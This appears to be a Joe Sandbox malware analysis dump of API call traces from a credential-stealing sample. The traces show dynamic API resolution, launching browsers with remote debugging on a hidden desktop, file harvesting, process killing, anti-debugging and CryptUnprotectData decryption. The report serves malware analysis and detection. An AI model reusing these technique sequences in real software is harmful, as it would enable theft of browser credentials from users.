                                                      • Instruction ID: 000dec1c19fe0f7876a2e2320d5e9d22f9bbf5c0b8a59f66f365fa5be0a60067
                                                      • Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                      • Instruction Fuzzy Hash: 4202BF70A04255AFCB11AFB5DC89BAEBBBAEF48304F14541AF805E7251DB78CD01DBA1
                                                      APIs
                                                      • GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 009F6680
                                                      • GetProcAddress.KERNEL32(006390E0,00638E44), ref: 009F6699
                                                      • GetProcAddress.KERNEL32(006390E0,00638A64), ref: 009F66B1
                                                      • GetProcAddress.KERNEL32(006390E0,00638A50), ref: 009F66C9
                                                      • GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 009F66E2
                                                      • GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 009F66FA
                                                      • GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 009F6712
                                                      • GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 009F672B
                                                      • GetProcAddress.KERNEL32(006390E0,00638D48), ref: 009F6743
                                                      • GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 009F675B
                                                      • GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 009F6774
                                                      • GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 009F678C
                                                      • GetProcAddress.KERNEL32(006390E0,006388B0), ref: 009F67A4
                                                      • GetProcAddress.KERNEL32(006390E0,00638D98), ref: 009F67BD
                                                      • GetProcAddress.KERNEL32(006390E0,00638A24), ref: 009F67D5
                                                      • GetProcAddress.KERNEL32(006390E0,00638C18), ref: 009F67ED
                                                      • GetProcAddress.KERNEL32(006390E0,00638E34), ref: 009F6806
                                                      • GetProcAddress.KERNEL32(006390E0,006388BC), ref: 009F681E
                                                      • GetProcAddress.KERNEL32(006390E0,0063892C), ref: 009F6836
                                                      • GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 009F684F
                                                      • LoadLibraryA.KERNEL32(00638D50,?,?,?,009F1E4A), ref: 009F6860
                                                      • LoadLibraryA.KERNEL32(0063897C,?,?,?,009F1E4A), ref: 009F6872
                                                      • LoadLibraryA.KERNEL32(00638904,?,?,?,009F1E4A), ref: 009F6884
                                                      • LoadLibraryA.KERNEL32(006389DC,?,?,?,009F1E4A), ref: 009F6895
                                                      • LoadLibraryA.KERNEL32(00638B28,?,?,?,009F1E4A), ref: 009F68A7
                                                      • GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 009F68C4
                                                      • GetProcAddress.KERNEL32(00639020,00638C24), ref: 009F68E0
                                                      • GetProcAddress.KERNEL32(00639020,006389CC), ref: 009F68F8
                                                      • GetProcAddress.KERNEL32(00639114,00638B94), ref: 009F6914
                                                      • GetProcAddress.KERNEL32(00638FD4,00638928), ref: 009F6930
                                                      • GetProcAddress.KERNEL32(00639004,00638C14), ref: 009F694C
                                                      • GetProcAddress.KERNEL32(00639004,00435864), ref: 009F6963
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2238633743-0
                                                      • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                      • Instruction ID: d086fa0a8fcea7daacaa3a410cac115f2ae18b36096024fb65620d9322cd6f65
                                                      • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                      • Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBFB89344300A51DF94683360DBB4A900DFB0
                                                      APIs
                                                      • memset.MSVCRT ref: 004097C4
                                                      • lstrcatA.KERNEL32(?,?), ref: 004097D8
                                                      • lstrcatA.KERNEL32(?,?), ref: 004097ED
                                                      • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00409800
                                                      • memset.MSVCRT ref: 00409815
                                                        • Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                        • Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,00A796F0), ref: 00423E6F
                                                        • Part of subcall function 00423E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                      • wsprintfA.USER32 ref: 00409846
                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409869
                                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409888
                                                      • memset.MSVCRT ref: 004098A6
                                                      • lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 004098BB
                                                      • lstrcatA.KERNEL32(?,?), ref: 004098CD
                                                      • lstrcatA.KERNEL32(?,00435128), ref: 004098DD
                                                      • memset.MSVCRT ref: 004098F2
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00409950
                                                      • StrStrA.SHLWAPI(?,00A7E6F8), ref: 00409965
                                                      • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
                                                      • lstrlenA.KERNEL32(?), ref: 00409996
                                                      • wsprintfA.USER32 ref: 004099A6
                                                      • lstrcpy.KERNEL32(?,?), ref: 004099BD
                                                      • memset.MSVCRT ref: 004099D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                      • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                                      • API String ID: 3051782728-1862457068
                                                      • Opcode ID: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
                                                      • Instruction ID: d19577a6994188075af4459c382a0e83ee01d0c412b4f1100e7ad714e1588002
                                                      • Opcode Fuzzy Hash: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
                                                      • Instruction Fuzzy Hash: 6091B5B1214340AFD720EF64DC45F9B77E9AF88704F10892DF649972D1DBB49904CBA6
                                                      APIs
                                                      • wsprintfA.USER32 ref: 009EE5BA
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 009EE5D0
                                                      • StrCmpCA.SHLWAPI(?,00431D70), ref: 009EE5EF
                                                      • StrCmpCA.SHLWAPI(?,00431D74), ref: 009EE607
                                                      • wsprintfA.USER32 ref: 009EE62E
                                                      • StrCmpCA.SHLWAPI(?,0042D01C), ref: 009EE643
                                                      • wsprintfA.USER32 ref: 009EE65F
                                                        • Part of subcall function 009EF197: lstrcpy.KERNEL32(00000000,?), ref: 009EF1C9
                                                      • wsprintfA.USER32 ref: 009EE67D
                                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 009EE692
                                                      • lstrcat.KERNEL32(?,00638D24), ref: 009EE6C7
                                                      • lstrcat.KERNEL32(?,00431D64), ref: 009EE6DA
                                                      • lstrcat.KERNEL32(?,?), ref: 009EE6EF
                                                      • lstrcat.KERNEL32(?,00431D64), ref: 009EE702
                                                      • lstrcat.KERNEL32(?,?), ref: 009EE718
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 009EE72D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EE766
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EE7BA
                                                      • DeleteFileA.KERNEL32(?), ref: 009EE7FB
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 009EE840
                                                      • FindClose.KERNEL32(00000000), ref: 009EE84F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                      • String ID:
                                                      • API String ID: 1375681507-0
                                                      • Opcode ID: 36bb2b642a6ec7b9687f7d675ca182e1ab4e96910ee8a02e493054bd41e1bc67
                                                      • Instruction ID: 2e9564c5af08b0dff31744e057a808eddb8576193ecf5f9c53581df6d55a070b
                                                      • Opcode Fuzzy Hash: 36bb2b642a6ec7b9687f7d675ca182e1ab4e96910ee8a02e493054bd41e1bc67
                                                      • Instruction Fuzzy Hash: E0813CB15043859BD721EF74DC89FEA77A9AFC8304F00891EF54987251EB75E908CBA2
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1849
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009D1880
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D18D3
                                                      • lstrcat.KERNEL32(00000000), ref: 009D18DD
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1909
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D1A5A
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009D1A65
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat
                                                      • String ID:
                                                      • API String ID: 2276651480-0
                                                      • Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                      • Instruction ID: 91d0672e92830369b1ae2d8dab6558b2c2c14715a6cee46058d8e3972c834443
                                                      • Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                      • Instruction Fuzzy Hash: B0817371981656ABCB21EFA4CC85BAE7BB9EF95304F048027F805A7351DB78DD01DBA0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009EE0CF
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009EE0D6
                                                      • wsprintfA.USER32 ref: 009EE0EE
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 009EE107
                                                      • StrCmpCA.SHLWAPI(?,00431D70), ref: 009EE125
                                                      • StrCmpCA.SHLWAPI(?,00431D74), ref: 009EE140
                                                      • wsprintfA.USER32 ref: 009EE160
                                                      • DeleteFileA.KERNEL32(?), ref: 009EE1B4
                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 009EE17B
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                        • Part of subcall function 009EDD07: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EDD62
                                                        • Part of subcall function 009EDD07: lstrcpy.KERNEL32(00000000,?), ref: 009EDD95
                                                        • Part of subcall function 009EDD07: lstrcat.KERNEL32(?,00000000), ref: 009EDDA3
                                                        • Part of subcall function 009EDD07: lstrcat.KERNEL32(?,00638B0C), ref: 009EDDBD
                                                        • Part of subcall function 009EDD07: lstrcat.KERNEL32(?,?), ref: 009EDDD1
                                                        • Part of subcall function 009EDD07: lstrcat.KERNEL32(?,00638DD8), ref: 009EDDE5
                                                        • Part of subcall function 009EDD07: lstrcpy.KERNEL32(00000000,?), ref: 009EDE15
                                                        • Part of subcall function 009EDD07: GetFileAttributesA.KERNEL32(00000000), ref: 009EDE1C
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 009EE1C3
                                                      • FindClose.KERNEL32(00000000), ref: 009EE1D2
                                                      • lstrcat.KERNEL32(?,00638D24), ref: 009EE1F9
                                                      • lstrcat.KERNEL32(?,00638A2C), ref: 009EE20B
                                                      • lstrlen.KERNEL32(?), ref: 009EE216
                                                      • lstrlen.KERNEL32(?), ref: 009EE225
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EE25B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                                      • String ID:
                                                      • API String ID: 3181694991-0
                                                      • Opcode ID: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
                                                      • Instruction ID: 9a65d398c4f1bfd3c143b10d10e3f197cd727ecbd1c11927ccf157be047f735b
                                                      • Opcode Fuzzy Hash: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
                                                      • Instruction Fuzzy Hash: 98513E715083849FC724EF74DC49AEA77EAAFC8315F00892EF99987290DB74D944CB92
                                                      APIs
                                                      • wsprintfA.USER32 ref: 009ED8C4
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 009ED8DB
                                                      • StrCmpCA.SHLWAPI(?,00431D70), ref: 009ED8FB
                                                      • StrCmpCA.SHLWAPI(?,00431D74), ref: 009ED915
                                                      • lstrcat.KERNEL32(?,00638D24), ref: 009ED95A
                                                      • lstrcat.KERNEL32(?,00638BF8), ref: 009ED96E
                                                      • lstrcat.KERNEL32(?,?), ref: 009ED982
                                                      • lstrcat.KERNEL32(?,?), ref: 009ED993
                                                      • lstrcat.KERNEL32(?,00431D64), ref: 009ED9A5
                                                      • lstrcat.KERNEL32(?,?), ref: 009ED9B9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009ED9F9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EDA49
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 009EDAAE
                                                      • FindClose.KERNEL32(00000000), ref: 009EDABD
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                                      • String ID:
                                                      • API String ID: 50252434-0
                                                      • Opcode ID: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
                                                      • Instruction ID: 0d229c3678affb1e2920d42bc2742655e47f230927ab96c06de73fa23e3c941d
                                                      • Opcode Fuzzy Hash: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
                                                      • Instruction Fuzzy Hash: C66163B19002599BCB14EF74CC84AED7BB9EF89304F0085A9F549A7251DB74AF44CFA0
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 004246E9
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
                                                      • StrCmpCA.SHLWAPI(?,?), ref: 0042470D
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
                                                      • CloseHandle.KERNEL32(00000000), ref: 00424738
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00424746
                                                      • CloseHandle.KERNEL32(00000000), ref: 00424751
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
                                                      • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009F4940
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 009F4950
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F4962
                                                      • StrCmpCA.SHLWAPI(?,?), ref: 009F4974
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009F4989
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 009F4998
                                                      • CloseHandle.KERNEL32(00000000), ref: 009F499F
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F49AD
                                                      • CloseHandle.KERNEL32(00000000), ref: 009F49B8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                      • String ID:
                                                      • API String ID: 3836391474-0
                                                      • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction ID: c7863537b97b9af9fbe554dac49f3c60aed6706e013fccc03705991fed528f2b
                                                      • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                      • Instruction Fuzzy Hash: 14018031601218ABEB215B60DC89FFB377DEB89B51F00119CFA05A6190EFB499848FB1
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 009F48AF
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 009F48BF
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F48D1
                                                      • StrCmpCA.SHLWAPI(?,00435644), ref: 009F48E7
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F48F9
                                                      • CloseHandle.KERNEL32(00000000), ref: 009F4904
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 2284531361-0
                                                      • Opcode ID: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
                                                      • Instruction ID: 9f63776cc6e0e4dc61f70145c7d7303094aed638f9502d9d99465e29c402aed4
                                                      • Opcode Fuzzy Hash: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
                                                      • Instruction Fuzzy Hash: 72014B31601228ABD7209B74AC89FEB77BDEF08751F0401D9F908D2150EBB49AA48FE1
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 009F8699
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009F86AE
                                                      • UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 009F86B9
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 009F86D5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 009F86DC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 2579439406-0
                                                      • Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                      • Instruction ID: e13bad3c44b4fc73d99b21764e7a15a2feff548611fcd9dd9fcf7047ed974eac
                                                      • Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                      • Instruction Fuzzy Hash: D521F0B590030A9FC760DF54F984A59BBB4FB28304F50607EF51887B62EBB069858F5D
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                      • HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                      • LocalFree.KERNEL32(?), ref: 004076F7
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                      • String ID:
                                                      • API String ID: 3657800372-0
                                                      • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                      • Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
                                                      • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                      • Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009D7905
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009D790C
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009D7934
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009D7954
                                                      • LocalFree.KERNEL32(?), ref: 009D795E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                      • String ID:
                                                      • API String ID: 2609814428-0
